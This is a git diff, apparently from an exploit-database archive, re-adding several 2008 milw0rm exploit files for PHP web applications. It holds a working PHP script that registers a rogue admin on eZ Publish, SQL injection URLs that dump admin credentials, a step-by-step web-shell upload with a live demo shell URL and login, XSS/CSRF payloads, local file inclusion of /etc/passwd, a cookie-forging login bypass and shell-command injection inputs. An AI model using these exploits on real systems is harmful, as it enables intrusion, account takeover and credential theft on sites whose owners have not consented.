@@ -1,123 +1,123 @@ -<?php - -/* - eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru] - Versions affected >= 3.5.6 - Resolved in 3.9.5, 3.10.1, 4.0.1 - More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible - - * tested on version 3.9.0 - - usage: - - # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server - - The options are required: - - -u Login of the new admin on eZ Publish - -p Password of the new admin on eZ Publish - -e Email where to go the letter for activation new admin account - -s Target for privilege escalation - - example: - - # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ - [+] Exploit successfully sending - [+] Activate your new account and be registered in system using toor/P@ssw0rd -*/ - -function help_argc($script_name) -{ -print " -usage: - -# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server - -The options are required: - -u Login of the new admin on eZ Publish - -p Password of the new admin on eZ Publish - -e Email where to go the letter for activation new admin account - -s Target for privilege escalation - -example: - -# ./".$script_name." 
-u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ -[+] Exploit successfully sending -[+] Activate your new account and be registered in system using toor/P@ssw0rd - -"; -} - -function successfully($login,$password) -{ -print " -[+] Exploit successfully sending -[+] Activate your new account and be registered in system using $login/$password -"; -} - -if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) -{ - help_argc($argv[0]); - exit(0); -} -else -{ - $ARG = array(); - foreach ($argv as $arg) { - if (strpos($arg, '-') === 0) { - $key = substr($arg,1,1); - if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); - } - } - - if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) - { - - $post_fields = array( - 'ContentObjectAttribute_data_user_login_30' => $ARG[u], - 'ContentObjectAttribute_data_user_password_30' => $ARG[p], - 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], - 'ContentObjectAttribute_data_user_email_30' => $ARG[e], - 'UserID' => '14', - 'PublishButton' => '1' - ); - - $headers = array( - 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', - 'Referer' => $ARG[s] - ); - - $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); - $res_http->addPostFields($post_fields); - $res_http->addHeaders($headers); - try { - $response = $res_http->send()->getBody(); - - if (eregi("success", $response)) - { - successfully($ARG[u],$ARG[p]); - } - else - { - print "[-] Exploit failed"; - } - - } catch (HttpException $exception) { - - print "[-] Not connected"; - exit(0); - - } - - } - else - { - help_argc($argv[0]); - exit(0); - } -} - -?> - -# milw0rm.com [2008-12-10] +<?php + +/* + eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru] + Versions affected >= 3.5.6 + Resolved in 3.9.5, 3.10.1, 4.0.1 + More info: 
http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible + + * tested on version 3.9.0 + + usage: + + # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server + + The options are required: + + -u Login of the new admin on eZ Publish + -p Password of the new admin on eZ Publish + -e Email where to go the letter for activation new admin account + -s Target for privilege escalation + + example: + + # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ + [+] Exploit successfully sending + [+] Activate your new account and be registered in system using toor/P@ssw0rd +*/ + +function help_argc($script_name) +{ +print " +usage: + +# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server + +The options are required: + -u Login of the new admin on eZ Publish + -p Password of the new admin on eZ Publish + -e Email where to go the letter for activation new admin account + -s Target for privilege escalation + +example: + +# ./".$script_name." 
-u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ +[+] Exploit successfully sending +[+] Activate your new account and be registered in system using toor/P@ssw0rd + +"; +} + +function successfully($login,$password) +{ +print " +[+] Exploit successfully sending +[+] Activate your new account and be registered in system using $login/$password +"; +} + +if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) +{ + help_argc($argv[0]); + exit(0); +} +else +{ + $ARG = array(); + foreach ($argv as $arg) { + if (strpos($arg, '-') === 0) { + $key = substr($arg,1,1); + if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); + } + } + + if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) + { + + $post_fields = array( + 'ContentObjectAttribute_data_user_login_30' => $ARG[u], + 'ContentObjectAttribute_data_user_password_30' => $ARG[p], + 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], + 'ContentObjectAttribute_data_user_email_30' => $ARG[e], + 'UserID' => '14', + 'PublishButton' => '1' + ); + + $headers = array( + 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', + 'Referer' => $ARG[s] + ); + + $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); + $res_http->addPostFields($post_fields); + $res_http->addHeaders($headers); + try { + $response = $res_http->send()->getBody(); + + if (eregi("success", $response)) + { + successfully($ARG[u],$ARG[p]); + } + else + { + print "[-] Exploit failed"; + } + + } catch (HttpException $exception) { + + print "[-] Not connected"; + exit(0); + + } + + } + else + { + help_argc($argv[0]); + exit(0); + } +} + +?> + +# milw0rm.com [2008-12-10] diff --git a/platforms/php/webapps/7407.txt b/platforms/php/webapps/7407.txt index 77b891a0b..fa4ff4a9b 100755 --- a/platforms/php/webapps/7407.txt +++ b/platforms/php/webapps/7407.txt 
@@ -1,45 +1,45 @@ -Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc - -Mail : darkangel_G85@yahoo.com - -___________________________________ - -script : http://www.unscripts.com/MPS.html - -DorK : :( - -exploit : -_______ - -http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin-- - - - -Demo : -_______ - -http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin-- - - -login : -http://www.site.com/Admin/login.php - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC -| -| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab -| -| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K -|_____________________________________________________________________ - - - - IM IraQi | IM TrYaGi - -# milw0rm.com [2008-12-10] +Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc + +Mail : darkangel_G85@yahoo.com + +___________________________________ + +script : http://www.unscripts.com/MPS.html + +DorK : :( + +exploit : +_______ + +http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin-- + + + +Demo : +_______ + +http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin-- + + +login : +http://www.site.com/Admin/login.php + +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC +| +| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab +| +| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K +|_____________________________________________________________________ + + + + IM IraQi | IM TrYaGi + +# milw0rm.com 
[2008-12-10] diff --git a/platforms/php/webapps/7408.txt b/platforms/php/webapps/7408.txt index d6fe2dcc3..14953f971 100755 --- a/platforms/php/webapps/7408.txt +++ b/platforms/php/webapps/7408.txt 
@@ -1,48 +1,48 @@ -Authot: Bgh7 - -Home: http://ozelteam.com - Turk Bilisim Gücleri - -Pst: bybgh7@msn.com - -============================= - -Dork: allinurl:clientsignup.php "classifieds" - -Dork2: Powered By: Living Local V1.1 - -Demo: http://www.jerseyads.net/listtest.php?r="><script>alert()</script> - -Demo2: http://homes.relatedlistings.com/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php - -http://homes.relatedlistings.com/Member_Admin/ - -E-Mail: bybgh7@msn.com -Password: tbg1122 -============================= - -you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol ) - -and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap ) - -after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] ) - -or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla ) - -and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et ) - -after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin ) - -if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI ) - -after repeat click to "Edit Account Info" and open page. 
your logo right click and properties select this link copy - -after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla - -acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas ) - - -========================== - -Thanks: str0ke - ÇılgınTurk - -# milw0rm.com [2008-12-10] +Authot: Bgh7 + +Home: http://ozelteam.com - Turk Bilisim Gücleri + +Pst: bybgh7@msn.com + +============================= + +Dork: allinurl:clientsignup.php "classifieds" + +Dork2: Powered By: Living Local V1.1 + +Demo: http://www.jerseyads.net/listtest.php?r="><script>alert()</script> + +Demo2: http://homes.relatedlistings.com/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php + +http://homes.relatedlistings.com/Member_Admin/ + +E-Mail: bybgh7@msn.com +Password: tbg1122 +============================= + +you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol ) + +and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap ) + +after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] ) + +or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla ) + +and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et ) + +after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin ) + +if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI ) + +after repeat click to "Edit Account Info" and open page. 
your logo right click and properties select this link copy + +after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla + +acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas ) + + +========================== + +Thanks: str0ke - ÇılgınTurk + +# milw0rm.com [2008-12-10] diff --git a/platforms/php/webapps/7409.txt b/platforms/php/webapps/7409.txt index e2ef48850..9758370d7 100755 --- a/platforms/php/webapps/7409.txt +++ b/platforms/php/webapps/7409.txt 
@@ -1,96 +1,96 @@ -######################################################################### -Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties -######################################################################### - - -## AUTHOR : ZynbER -## MAiL : ZynbER[at]Gmail[dot]com -## HOME : NoWhere - - -## Script WebSite : http://www.prochatrooms.com - -## Version : Pro Chat Rooms Version 3.0.2 - - -## EXPLOITS : - --==XSS==- - -http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED - -Vulnerable code in "/profiles/index.php" - - -<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b> - - --==CSRF==- - -When a user sends a message in public room or in pm to onther user ; there is a parameter -to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message - -The JS sending function; here u can see all params needed to POST a message to user/room - -//Add a message to the chat server. -function sendChatText() { - -if(!document.getElementById('txt_message').value) { - alert("You have not entered a message "); - return; -} - if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) { - alert("You cannot whisper to yourself! 
"); - return; -} -if (sendReq.readyState == 4 || sendReq.readyState == 0) { - sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true); - sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); - sendReq.onreadystatechange = handleSendChat; - var param = 'message=' + document.getElementById('txt_message').value; - param += '&name=' + chat_user; - param += '&nid=' + chat_userid; - param += '&chat=1'; - param += '&room=' + room; - param += '&whisper=' + document.getElementById('whisper').value; - param += '&fontface=' + document.getElementById('font_face').value; - param += '&fontcolor=' + document.getElementById('font_color').value; - param += '&fontheight=' + document.getElementById('font_height').value; - param += '&fontstyle=' + document.getElementById('font_style').value; - param += '&avatar=' + document.getElementById('user_avatar').value; - sendReq.send(param); - document.getElementById('txt_message').value = ''; - } -} - - -Exploit Example: - -default ==> http://www.yoursite.com/[path]/Avatars/online.gif - - -Your mallecious CSRF param; avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php - - -in this example the user will logout when he recieves ur message; in a public room all users will -be loged out from the room ;) - - - - -## Note: - -This infos are for educational purpose only; -I'm not responsable for any damage caused... 
- - - -## GREETZ : Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka - - -=== Marequin est fière de l'être ===- - -######################################################################### -Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties -######################################################################### - -# milw0rm.com [2008-12-10] +######################################################################### +Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties +######################################################################### + + +## AUTHOR : ZynbER +## MAiL : ZynbER[at]Gmail[dot]com +## HOME : NoWhere + + +## Script WebSite : http://www.prochatrooms.com + +## Version : Pro Chat Rooms Version 3.0.2 + + +## EXPLOITS : + +-==XSS==- + +http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED + +Vulnerable code in "/profiles/index.php" + + +<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b> + + +-==CSRF==- + +When a user sends a message in public room or in pm to onther user ; there is a parameter +to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message + +The JS sending function; here u can see all params needed to POST a message to user/room + +//Add a message to the chat server. +function sendChatText() { + +if(!document.getElementById('txt_message').value) { + alert("You have not entered a message "); + return; +} + if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) { + alert("You cannot whisper to yourself! 
"); + return; +} +if (sendReq.readyState == 4 || sendReq.readyState == 0) { + sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true); + sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); + sendReq.onreadystatechange = handleSendChat; + var param = 'message=' + document.getElementById('txt_message').value; + param += '&name=' + chat_user; + param += '&nid=' + chat_userid; + param += '&chat=1'; + param += '&room=' + room; + param += '&whisper=' + document.getElementById('whisper').value; + param += '&fontface=' + document.getElementById('font_face').value; + param += '&fontcolor=' + document.getElementById('font_color').value; + param += '&fontheight=' + document.getElementById('font_height').value; + param += '&fontstyle=' + document.getElementById('font_style').value; + param += '&avatar=' + document.getElementById('user_avatar').value; + sendReq.send(param); + document.getElementById('txt_message').value = ''; + } +} + + +Exploit Example: + +default ==> http://www.yoursite.com/[path]/Avatars/online.gif + + +Your mallecious CSRF param; avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php + + +in this example the user will logout when he recieves ur message; in a public room all users will +be loged out from the room ;) + + + + +## Note: + +This infos are for educational purpose only; +I'm not responsable for any damage caused... + + + +## GREETZ : Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka + + -=== Marequin est fière de l'être ===- + +######################################################################### +Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties +######################################################################### + +# milw0rm.com [2008-12-10] diff --git a/platforms/php/webapps/7411.txt b/platforms/php/webapps/7411.txt index bd9e5ed47..f0cc09efa 100755 --- a/platforms/php/webapps/7411.txt +++ b/platforms/php/webapps/7411.txt 
@@ -1,35 +1,35 @@ -######################################################################################### -[0x01] Informations: - -Name : Butterfly Organizer 2.0.1 Sql Injection -Download : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1 -Vulnerability : Remote Sql Injection -Author : Osirys -Contact : osirys[at]live[dot]it -Notes : Proud to be Italian -* : Same bug of the previous version: http://milw0rm.com/exploits/5797 - -######################################################################################### -[0x02] Bug: - -Bugged file is /[path]/view.php - -[CODE] -$mytable = $_GET['mytable']; -$id = $_GET['id']; - -$result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database); -$myrow = mysql_fetch_array($result); -[/CODE] - -Query accept direct GET input, so we can inject hell sql code. -To avoid this vulnerability, just escape GET input. - -######################################################################################### -[0x03] Exploit: - -http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category - -######################################################################################## - -# milw0rm.com [2008-12-10] +######################################################################################### +[0x01] Informations: + +Name : Butterfly Organizer 2.0.1 Sql Injection +Download : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1 +Vulnerability : Remote Sql Injection +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +* : Same bug of the previous version: http://milw0rm.com/exploits/5797 + +######################################################################################### +[0x02] Bug: + +Bugged file is /[path]/view.php + +[CODE] +$mytable = $_GET['mytable']; +$id = $_GET['id']; + +$result = mysql_query("SELECT * FROM ".$mytable." 
WHERE id=$id",$database); +$myrow = mysql_fetch_array($result); +[/CODE] + +Query accept direct GET input, so we can inject hell sql code. +To avoid this vulnerability, just escape GET input. + +######################################################################################### +[0x03] Exploit: + +http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category + +######################################################################################## + +# milw0rm.com [2008-12-10] diff --git a/platforms/php/webapps/7417.txt b/platforms/php/webapps/7417.txt index 8fdd2e7fa..c71d39ea0 100755 --- a/platforms/php/webapps/7417.txt +++ b/platforms/php/webapps/7417.txt 
@@ -1,27 +1,27 @@ -#phpaddedit-1.3 LFI - - -#Author: nuclear - - -#script:http://sourceforge.net/projects/phpaddedit/ - - -#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00 - - -#vulnerable code: -if (!$formname && $_GET["editform"]) $formname = $_GET["editform"]; -... -if ( $error_message || $error || !$_POST["submitval"] ) { - include_once ($formname."-header.inc.php"); - include_once ($addeditcwd."addedit-create-form.php"); - include_once ($formname."-footer.inc.php"); -} - - - - -#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r - -# milw0rm.com [2008-12-10] +#phpaddedit-1.3 LFI + + +#Author: nuclear + + +#script:http://sourceforge.net/projects/phpaddedit/ + + +#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00 + + +#vulnerable code: +if (!$formname && $_GET["editform"]) $formname = $_GET["editform"]; +... +if ( $error_message || $error || !$_POST["submitval"] ) { + include_once ($formname."-header.inc.php"); + include_once ($addeditcwd."addedit-create-form.php"); + include_once ($formname."-footer.inc.php"); +} + + + + +#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r + +# milw0rm.com [2008-12-10] diff --git a/platforms/php/webapps/7418.txt b/platforms/php/webapps/7418.txt index 390276c44..321acfac5 100755 --- a/platforms/php/webapps/7418.txt +++ b/platforms/php/webapps/7418.txt 
@@ -1,39 +1,39 @@ -------------------------------------- - PhpAddEdit 1.3 Login By Pass -------------------------------------- - -Found By: x0r ( Evolution Team ) -Email: andry2000@hotmail.it -------------------------------------- - -Bug In: Addedit-login.php - - if (!$login_error) { - // --- Set admin cookie so favorite form field will show up when I use -the site... - if ($_POST["rememberme"]) { - $expire = mktime(0,0,0,date("m"),date("d")+120,date("Y")); - setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0); - } else { - setcookie("addedit", $_POST["adminuser"]); - } - Header("Location: ./"); - } - } - -Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^ -------------------------------------- - -Exploit: - -javascript:document.cookie = "addedit=[adminuser]; path=/"; - -es: - -javascript:document.cookie = "addedit=x0r; path=/"; --------------------------------------- -Live Demo: http://www.phpaddedit.com/demo/ --------------------------------------- -Greetz: Amore oggi +65 ti amo troppo. - -# milw0rm.com [2008-12-11] +------------------------------------- + PhpAddEdit 1.3 Login By Pass +------------------------------------- + +Found By: x0r ( Evolution Team ) +Email: andry2000@hotmail.it +------------------------------------- + +Bug In: Addedit-login.php + + if (!$login_error) { + // --- Set admin cookie so favorite form field will show up when I use +the site... 
+ if ($_POST["rememberme"]) { + $expire = mktime(0,0,0,date("m"),date("d")+120,date("Y")); + setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0); + } else { + setcookie("addedit", $_POST["adminuser"]); + } + Header("Location: ./"); + } + } + +Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^ +------------------------------------- + +Exploit: + +javascript:document.cookie = "addedit=[adminuser]; path=/"; + +es: + +javascript:document.cookie = "addedit=x0r; path=/"; +-------------------------------------- +Live Demo: http://www.phpaddedit.com/demo/ +-------------------------------------- +Greetz: Amore oggi +65 ti amo troppo. + +# milw0rm.com [2008-12-11] diff --git a/platforms/php/webapps/7422.txt b/platforms/php/webapps/7422.txt index 47e6a2903..6ba7a58a3 100755 --- a/platforms/php/webapps/7422.txt +++ b/platforms/php/webapps/7422.txt 
@@ -1,29 +1,29 @@ -############################### -Feed Cms 1.07.03.19 Beta LFI -############################### -Autore: x0r -Email: andry2000@hotmail.it -Download: -http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar -############################### -Bug In: index.php - -if ($_GET['lang']) -{ - $language = $_GET['lang']; - - setcookie('firstlang',$language,time()+3600*240*365); - header('location:'.$redirect); -} -$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang; -include_once($FeedCms_Dir."lang/$lang/$lang.php"); - -LFI By Cookie ^ ^ - -Exploit: - -http://[site]/FeedCms/?lang=[LFI] ^ ^ - -Greetz: A Te Che Mi Hai Cambiato La Vita... - -# milw0rm.com [2008-12-11] +############################### +Feed Cms 1.07.03.19 Beta LFI +############################### +Autore: x0r +Email: andry2000@hotmail.it +Download: +http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar +############################### +Bug In: index.php + +if ($_GET['lang']) +{ + $language = $_GET['lang']; + + setcookie('firstlang',$language,time()+3600*240*365); + header('location:'.$redirect); +} +$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang; +include_once($FeedCms_Dir."lang/$lang/$lang.php"); + +LFI By Cookie ^ ^ + +Exploit: + +http://[site]/FeedCms/?lang=[LFI] ^ ^ + +Greetz: A Te Che Mi Hai Cambiato La Vita... + +# milw0rm.com [2008-12-11] diff --git a/platforms/php/webapps/7426.txt b/platforms/php/webapps/7426.txt index c60819e5e..378750e6c 100755 --- a/platforms/php/webapps/7426.txt +++ b/platforms/php/webapps/7426.txt 
@@ -1,26 +1,26 @@ -****(remote file upload)**** - -script: PHP_Support_Tickets_v2.2 - -*************************************************************************** -download from:http://www.phpsupporttickets.com/modules/phpsupporttickets.com/dist/free/PHP_Support_Tickets_v2.2.zip - -*************************************************************************** -1:www.site.com/path/index.php?page=register - -2:New Ticket - -3:upload php file - -shell www.site.com/path/upload/you user/phpst_ticket_number/shell.php - -*************************************************** - - -Author: ahmadbady - -my mail: kivi_hacker666@yahoo.com - -*************************************************** - -# milw0rm.com [2008-12-11] +****(remote file upload)**** + +script: PHP_Support_Tickets_v2.2 + +*************************************************************************** +download from:http://www.phpsupporttickets.com/modules/phpsupporttickets.com/dist/free/PHP_Support_Tickets_v2.2.zip + +*************************************************************************** +1:www.site.com/path/index.php?page=register + +2:New Ticket + +3:upload php file + +shell www.site.com/path/upload/you user/phpst_ticket_number/shell.php + +*************************************************** + + +Author: ahmadbady + +my mail: kivi_hacker666@yahoo.com + +*************************************************** + +# milw0rm.com [2008-12-11] diff --git a/platforms/php/webapps/7430.txt b/platforms/php/webapps/7430.txt index 0ed620496..e4f6e0b80 100755 --- a/platforms/php/webapps/7430.txt +++ b/platforms/php/webapps/7430.txt 
@@ -1,78 +1,77 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################ - # [ sumon <= 0.7.0 ] Remote Command Execution Vulnerability # - ################################################################ - # - # Script: Simple Unix MONitor (sumon) - # - # Script Site: http://sumon.sourceforge.net/ - # Download: http://sourceforge.net/projects/sumon - # - # Vuln: http://site.com/sumon-0.7.0/chg.php?host=|id>/tmp/dupa; - # - # Bug: ./sumon-0.7.0/server/www/chg.php (lines: 32-25, 99) - # - # ... - # if (array_key_exists("host",$_GET)) - # { - # $host = $_GET["host"]; - # } - # ... - # passthru("${bindir}/chmgmtinfobuilder.pl --html --chgonly --node=$host --days=$days"); - # ... - # - # Vuln: http://site.com/sumon-0.7.0/stats.php?host=|id>/tmp/dupa; - # - # Bug: ./sumon-0.7.0/server/www/stats.php (lines: 23-25, 294) - # - # ... - # if (array_key_exists("host",$_GET)) - # { - # $host = $_GET["host"]; - # ... - # exec ("$graphstats -h $host -l $graphic -g GRAPH:".$time.":".$timefactor." ".$timestampstring." ".$endstring." > /dev/null 2>&1"); - # ... - # - # Vuln: http://site.com/sumon-0.7.0/showfile.php - # http://site.com/sumon-0.7.0/difffile.php - # - # POST /sumon-0.7.0/showfile.php HTTP/1.1 - # - # Host: site.com - # User-Agent: Mozilla/5.0 - # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - # Accept-Language: pl,en-us;q=0.7,en;q=0.3 - # Accept-Encoding: gzip,deflate - # Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 - # Keep-Alive: 300 - # Connection: keep-alive - # Content-Type: application/x-www-form-urlencoded - # Content-Length: 27 - # - # fichero_post=|id>/tmp/dupa; - # - # Bug: ./sumon-0.7.0/server/www/showfile.php (lines: 36) - # ./sumon-0.7.0/server/www/difffile.php (lines: 36) - # ... 
- # passthru("${bindir}/showfile.pl ${datadir}/$_POST[fichero_post]"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-12-12] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################ + # [ sumon <= 0.7.0 ] Remote Command Execution Vulnerability # + ################################################################ + # + # Script: Simple Unix MONitor (sumon) + # + # Script Site: http://sumon.sourceforge.net/ + # Download: http://sourceforge.net/projects/sumon + # + # Vuln: http://site.com/sumon-0.7.0/chg.php?host=|id>/tmp/dupa; + # + # Bug: ./sumon-0.7.0/server/www/chg.php (lines: 32-25, 99) + # + # ... + # if (array_key_exists("host",$_GET)) + # { + # $host = $_GET["host"]; + # } + # ... + # passthru("${bindir}/chmgmtinfobuilder.pl --html --chgonly --node=$host --days=$days"); + # ... + # + # Vuln: http://site.com/sumon-0.7.0/stats.php?host=|id>/tmp/dupa; + # + # Bug: ./sumon-0.7.0/server/www/stats.php (lines: 23-25, 294) + # + # ... + # if (array_key_exists("host",$_GET)) + # { + # $host = $_GET["host"]; + # ... + # exec ("$graphstats -h $host -l $graphic -g GRAPH:".$time.":".$timefactor." ".$timestampstring." ".$endstring." > /dev/null 2>&1"); + # ... 
+ # + # Vuln: http://site.com/sumon-0.7.0/showfile.php + # http://site.com/sumon-0.7.0/difffile.php + # + # POST /sumon-0.7.0/showfile.php HTTP/1.1 + # + # Host: site.com + # User-Agent: Mozilla/5.0 + # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + # Accept-Language: pl,en-us;q=0.7,en;q=0.3 + # Accept-Encoding: gzip,deflate + # Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 + # Keep-Alive: 300 + # Connection: keep-alive + # Content-Type: application/x-www-form-urlencoded + # Content-Length: 27 + # + # fichero_post=|id>/tmp/dupa; + # + # Bug: ./sumon-0.7.0/server/www/showfile.php (lines: 36) + # ./sumon-0.7.0/server/www/difffile.php (lines: 36) + # ... + # passthru("${bindir}/showfile.pl ${datadir}/$_POST[fichero_post]"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7432.txt b/platforms/php/webapps/7432.txt index b3de97621..a356ea194 100755 --- a/platforms/php/webapps/7432.txt +++ b/platforms/php/webapps/7432.txt 
